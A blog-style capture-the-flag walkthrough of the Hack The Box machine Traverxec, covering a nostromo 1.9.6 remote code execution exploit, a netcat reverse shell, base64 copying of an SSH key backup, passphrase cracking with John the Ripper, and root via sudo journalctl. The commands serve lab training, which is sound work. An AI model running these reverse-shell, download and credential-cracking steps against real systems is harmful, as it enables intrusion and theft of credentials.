Hack the box(HTB) Traverxec write up

Hack the box(HTB) Traverxec write up
Hack the box(HTB) Traverxec write up

Commands used

1-nmap -sC -sV -O -v -oA initial
2-python getshell.py 80 "cd / && mkdir tmp"
3-python getshell.py 80 "cd /tmp && wget"
4-python getshell.py 80 "/tmp/nc -e /bin/bash 4444"
5-cd /home/david/public_www
6-base64 backup-ssh-identity-files.tgz
7-base64 -d file >>new file
8-/usr/share/john/ssh2john.py id_rsa
9-john hash --wordlist=/root/Desktop/rockyou.txt
10-ssh -i id_rsa [email protected]
11-/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
Hack the box(HTB) Traverxec write up

Steps invloved

2-Exploiting nostromo 1.9.6
3-Getting a complete shell
4-Getting id_rsa for User David
5-Getting keyprase for id_rsa
6-Getting user.txt
7-Exploiting journalctl (Getting root.txt)


Nmap scan

Nmap 7.70 scan initiated Thu Apr  9 21:41:24 2020 as: nmap -sC -sV -O -p- -v -oV
Nmap scan report for
Host is up (0.28s latency).
Not shown: 65533 filtered ports
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34 | http-methods: | Supported Methods: GET HEAD POST
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Crestron XPanel control system (90%), Linux 3.18 (89%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 45.541 days (since Mon Feb 24 07:47:21 2020)
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Thu Apr 9 21:46:56 2020 -- 1 IP address (1 host up) scanned in 333.39 seconds
Hack the box(HTB) Traverxec write up

The first thing which is very uncommon is the version of the http nostromo

So lets google about it and try to find some exploits of it.

Exploiting nostromo 1.9.6

Hack the box(HTB) Traverxec write up

On the top i got rapid 7 cve hence i used that can copied it my machine as getshell.py.

Hack the box(HTB) Traverxec write up

Getting a complete shell

This is a one line shell so lets first get a full shell.

Through this i uploaded nc to the target and then started reverse shell .

Hack the box(HTB) Traverxec write up

Before executing this make sure you have your python server on.

Hack the box(HTB) Traverxec write up
root@nagendra:~/Desktop/htb/traverxec# python getshell.py 80 "cd /tmp && chmod +x nc"
Hack the box(HTB) Traverxec write up

Hence now we have a full shell as www user

Getting id_rsa for User David

After a little enumeration i found a conf file

servername traverxec.htb
serverlisten *
serveradmin [email protected]
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
logpid logs/nhttpd.pid
user www-data
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
/icons /var/nostromo/icons
homedirs /home
homedirs_public public_www

So there is a directory public_www in david so lets check that

cd /home/david/public_www
cd protected-file-area
base64 backup-ssh-identity-files.tgz

Found a backup file lets download it using base64

Hack the box(HTB) Traverxec write up

Then copying that in file and then decoding it.

base64 -d file >>new file

after extracting it i got id_rsa key for david.

Hack the box(HTB) Traverxec write up

Getting keyprase for id_rsa

In order to get the key prase of it .First i had to convert it into hash.Using ssh2john

locate ssh2john

in order to find it in your machine.

Hack the box(HTB) Traverxec write up

Now lets decrypt it using john the ripper.

Hack the box(HTB) Traverxec write up

Getting User.txt

Now Simply login in ssh and get the user flag.

Hack the box(HTB) Traverxec write up

Exploiting journalctl (Getting root.txt)

Now let’s do privilege escalation .

Found a server-stats.sh

Hack the box(HTB) Traverxec write up
 david@traverxec:~/bin$ cat server-stats.sh 
cat /home/david/bin/server-stats.head
echo "Load: /usr/bin/uptime"
echo " "
echo "Open nhttpd sockets: /usr/bin/ss -H sport = 80 | /usr/bin/wc -l"
echo "Files in the docroot: /usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Used gtfobins for exploiting this binary.

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Thu 2020-04-09 19:07:20 EDT, end at Fri 2020-04-10 00:11:15 EDT. --
Apr 09 19:07:25 traverxec systemd[1]: Started nostromo nhttpd server.
Apr 09 19:19:00 traverxec sudo[760]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=ww
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): conversation failed
Apr 09 19:19:03 traverxec sudo[760]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 09 19:19:03 traverxec sudo[760]: www-data : command not allowed ; TTY=pts/0 ; PWD=/home/david ; USER=root ; COMMAND=list
root@traverxec:/home/david/bin# whoami
root@traverxec:/home/david/bin# cd /
root@traverxec:/# ls
bin dev home initrd.img.old lib32 libx32 media opt root sbin sys usr vmlinuz
boot etc initrd.img lib lib64 lost+found mnt proc run srv tmp var vmlinuz.old
root@traverxec:/# cd root
root@traverxec:~# ls
nostromo_1.9.6-1.deb root.txt
root@traverxec:~# cat root.txt

How useful was this post?

Click on a star to rate it!

Average rating 0 / 5. Vote count: 0

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?


No comments yet. Why don’t you start the discussion?

Leave a Reply

Your email address will not be published. Required fields are marked *